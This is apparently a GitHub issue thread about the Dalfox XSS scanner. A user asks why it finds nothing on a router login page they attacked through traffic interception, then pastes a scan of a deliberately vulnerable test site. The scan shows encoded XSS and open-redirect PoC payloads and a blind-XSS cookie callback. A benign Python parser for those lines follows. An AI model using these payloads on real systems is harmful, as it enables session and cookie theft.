Your questions
When I scan a router login page it doesn't show any exploitations available
but I know that the login page is exploitable because it is susceptible to XSS during a mitma
Environment
Dalfox Version: v2.8.2
Installed from: (e.g go-get/snapcraft/homebrew)
go
what method is available for me to exploit our given target?
thanks dev team btw what parameters would you consider using in order to see the
if our payload executed successfully without the url encoding
Hi @CHillyVibes
Thank you so much for submitting the issue!
I didn't understand the question exactly. Is it a question about false negatives?
Since Dalfox uses different payload combinations, sometimes you can also use payloads that require interaction. Dalfox tries to find an XSS that triggers as soon as it opens in the browser, preferably, but sometimes it gives me a slightly complicated PoC.
It's about Dalfox not showing vulnerabilities at all, but I know the router login page is vulnerable to stored XSS and reflected XSS because I can inject scripts into the web page and execute scripts from the URL bar when doing a mitma and visiting from a target device.
It works wonders against websites, showing me vulnerabilities, and I have even applied XSS attacks with vulnerabilities found and they do exploit the web pages correctly. I'm looking for the same finds when targeting a router with the URL being IPv4 192.168.1.1
sudo ./dalfox url http://testphp.vulnweb.com/listproducts.php?cat=1 -b /home/kali/scripts/cookies.js
.' .::::. __ _ _ ___ _ __ __
: :::::::: | \ / \ | | | / \ V /
: :::::::: | o ) o || | | _( o )) (
'. '::::::' |/|n||_||| _//n
'-.::''
🌙🦊 Powerful open source XSS scanning tool and parameter analyzer, utility
🎯 Target http://testphp.vulnweb.com/listproducts.php?cat=1
🏁 Method GET
🖥 Worker 100
🔦 BAV true
⛏ Mining true (Gf-Patterns)
🔬 Mining-DOM true (mining from DOM)
🛰 Blind XSS Callback /home/kali/scripts/cookies.js
⏱ Timeout 10
📤 FollowRedirect false
🕰 Started at 2023-03-22 00:54:14.754845369 +0000 UTC m=+0.011778748
[*] 🦊 Start scan [SID:Single] / URL: http://testphp.vulnweb.com/listproducts.php?cat=1
[G] Found dalfox-error-mysql5 via built-in grepping / payload: toOpenRedirecting
check the manual that corresponds to your MySQL server version
[POC][G][GET][BUILTIN] http://testphp.vulnweb.com/listproducts.php?cat=%2F%2F%2F%2509%2Fgoogle.com
[I] Found 2 testing point in DOM base parameter mining
[I] Found 1 testing point in Dictionary base paramter mining
[I] Content-Type is text/html; charset=UTF-8
[I] Reflected cat param => PTYPE: URL Injected: /inHTML-none(1) $
48 line: Error: Unknown column '1DalFox' in 'where cl
[W] Reflected Payload in HTML: cat='>click
48 line: syntax to use near ''>click' at line 1
[POC][R][GET][inHTML-URL] http://testphp.vulnweb.com/listproducts.php?cat=1%27%3E%3Ca+href%3D%27javascript%26colon%3Balert%281%29%27%3Eclick
[V] Triggered XSS Payload (found DOM Object): cat=
1
[POC][V][GET][inHTML-none(1)-URL] http://testphp.vulnweb.com/listproducts.php?cat=1%3Cdiv+contextmenu%3Dxss%3E%3Cp%3E1%3Cmenu+type%3Dcontext+class%3Ddalfox+id%3Dxss+onshow%3Dprompt.valueOf%28%29%281%29%3E%3C%2Fmenu%3E%3C%2Fdiv%3E
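For reading the PoC lines in the scan output above without the URL encoding, and for separating verified findings from grep-only or reflected-only ones, here is an added example that is not part of the original issue or of Dalfox's own code. It assumes the `[POC][type][method][context] url` line shape seen above and Dalfox's G/R/V type letters (grep, reflected, verified); the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Line shape as it appears in the scan output on this page:
#   [POC][<type>][<method>][<context>] <url>
POC_RE = re.compile(
    r"^\[POC\]\[(?P<type>[GRV])\]\[(?P<method>[A-Z]+)\]\[(?P<context>[^\]]+)\]\s+(?P<url>\S+)$"
)

# Assumed meaning of the type letter (Dalfox's G/R/V convention).
EVIDENCE = {
    "G": "grep pattern matched in the response",
    "R": "payload reflected, execution not confirmed",
    "V": "payload verified as triggered in the DOM",
}

# One info line and the three PoC lines copied from the output above.
SAMPLE = """\
[I] Content-Type is text/html; charset=UTF-8
[POC][G][GET][BUILTIN] http://testphp.vulnweb.com/listproducts.php?cat=%2F%2F%2F%2509%2Fgoogle.com
[POC][R][GET][inHTML-URL] http://testphp.vulnweb.com/listproducts.php?cat=1%27%3E%3Ca+href%3D%27javascript%26colon%3Balert%281%29%27%3Eclick
[POC][V][GET][inHTML-none(1)-URL] http://testphp.vulnweb.com/listproducts.php?cat=1%3Cdiv+contextmenu%3Dxss%3E%3Cp%3E1%3Cmenu+type%3Dcontext+class%3Ddalfox+id%3Dxss+onshow%3Dprompt.valueOf%28%29%281%29%3E%3C%2Fmenu%3E%3C%2Fdiv%3E
"""

def parse_poc_lines(text):
    """Return one dict per PoC line, with query parameters percent-decoded."""
    findings = []
    for line in text.splitlines():
        m = POC_RE.match(line.strip())
        if m is None:
            continue  # banner, [I]/[W] messages, wrapped error text
        finding = m.groupdict()
        # parse_qsl decodes %XX and '+' once; double-encoded bytes stay encoded.
        query = urlsplit(finding["url"]).query
        finding["params"] = dict(parse_qsl(query, keep_blank_values=True))
        finding["evidence"] = EVIDENCE[finding["type"]]
        findings.append(finding)
    return findings

def verified_only(findings):
    """Keep only findings the scanner confirmed, dropping grep and reflection hits."""
    return [f for f in findings if f["type"] == "V"]

if __name__ == "__main__":
    for f in parse_poc_lines(SAMPLE):
        print(f["type"], f["evidence"], f["params"], sep=" | ")
```

A scan that prints no `[POC]` lines at all, as described for the router, yields an empty list here, so the absence of findings is visible to whatever consumes the parsed output.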